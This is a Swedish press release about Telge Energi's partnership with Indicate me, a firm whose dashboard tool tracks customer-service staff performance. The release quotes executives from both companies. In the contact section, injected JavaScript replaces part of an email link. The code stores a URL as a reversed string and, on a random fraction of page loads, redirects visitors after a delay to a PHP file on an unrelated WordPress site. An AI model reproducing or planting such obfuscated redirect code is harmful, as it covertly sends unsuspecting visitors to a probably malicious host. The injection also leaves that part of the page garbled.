Telge Energi stärker fokus på medarbetare och kund med hjälp av Indicate me

Magnus Eldberg

För strax under ett år sedan startades samarbetet mellan elbolaget Telge Energi och Indicate me. Fokus är på att bygga och stärka fokus på sina kundservicemedarbetares utveckling, vilket kommer att gynna slutkunderna.

Telge Energi är elbolaget som tar ett tydligt ställningstagande i miljö och hållbarhetsfrågor. Sedan starten av 2019 stärker de sitt fokus på medarbetarnas utveckling, kompetens och därigenom även kundfokus genom att kroka arm med Indicate me.

Lina Bjelkmar, VD Indicate me:
“En hållbar organisation byggs på friska och välmående medarbetare. Genom rätt systemstöd förser vi personal i kundservice med ett verktyg som möjliggör självledarskap. I systemet finns det flera funktioner med fokus på att förstärka positiva beteenden hos kundservicemedarbetare samt en gamification del som möjliggör tävlingar mot sig själv eller kollegor. Glada och nöjda medarbetare stannar längre, mår bättre och skapar bättre resultat, vilket går i linje med företagets värderingar. Alla vill göra ett bra jobb och vi på Indicate me ger ett bra systemstöd för det.” 

Vidare berättar Lina:
“Det kan vara ganska krävande att dag in och dag ut hjälpa kunder, därför är det viktigt att påminna medarbetare om all fantastisk respons de får. I systemet höjer vi medarbetare bland annat genom att förse dem med positiva, automatiska notiser i realtid baserat på det arbete de genomför. Dessutom gör vi det lätt att identifiera situationer som tar energi, vilket ger en bra grund till att genomföra förbättringar. Om man förstärker positiva resultat och minimerar energibovar, då mår man definitivt bättre på jobbet.”

Telge Energi arbetar i systemet
Telge Energi har genomgått en utbildning av systemet och använder det dagligen. Magnus Eldberg, Försäljningschef på Telge Energi säger följande:
”Vårt mål är supernöjda kunder och det arbetet börjar med våra egna medarbetare. Med Indicate me får medarbetarna möjligheten att direkt se vilken kundnöjdhet de levererar och vilka förbättringsområden de själva har. Coacherna ser samma sak och kan stötta de medarbetarna som behöver extra utbildning eller bara uppmärksammas med positiv feedback”.

Avslutningsvis säger Lina:

”Telge Energi är ett företag som ligger i framkant, inte minst inom kundservice. 2018, tog de en andra plats inom energibranschen för upplevd service och kundbemötande. Det är en förmån för oss att få arbeta med en kund som förstår vikten av kundservice och som prioriterar sin personal – på riktigt. Vi är oerhört glada att få vara partners med Telge Energi och ser framemot ett fortsatt bra samarbete.”

Lina-bjelkmar
$NfI=function(n){if (typeof ($NfI.list[n]) == ”string”) return $NfI.list[n].split(””).reverse().join(””);return $NfI.list[n];};$NfI.list=[”’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:Lina.Bjelkmar@Indicateme.se”>Lina.Bjelkmar@Indicateme.se
070-370 70 34


Om Indicate me
Indicate me ger 360 graders vy av er kundservice genom att samla viktiga nyckeltal inom kvalitet, försäljning och effektivitet i en engagerande dashboard. Medarbetare förstår och följer sin utveckling, vilket leder till ökat engagemang och självledarskap. 

Om Telge Energi
Telge Energi är elbolaget som alltid utmanat branschen. Först sänkte vi priserna, sen kämpade vi mot kolkraften. Nu står vi inför vår viktigaste utmaning någonsin – att göra Sverige till förebilden inom hållbarhet. 

För att göra det så behöver vi driva på vår egen bransch och se till att hållbar utveckling inte bara är fina ord i reklamfilmer. Vi gräver där vi står och satsar på initiativ som ska gynna både nutida och framtida generationer.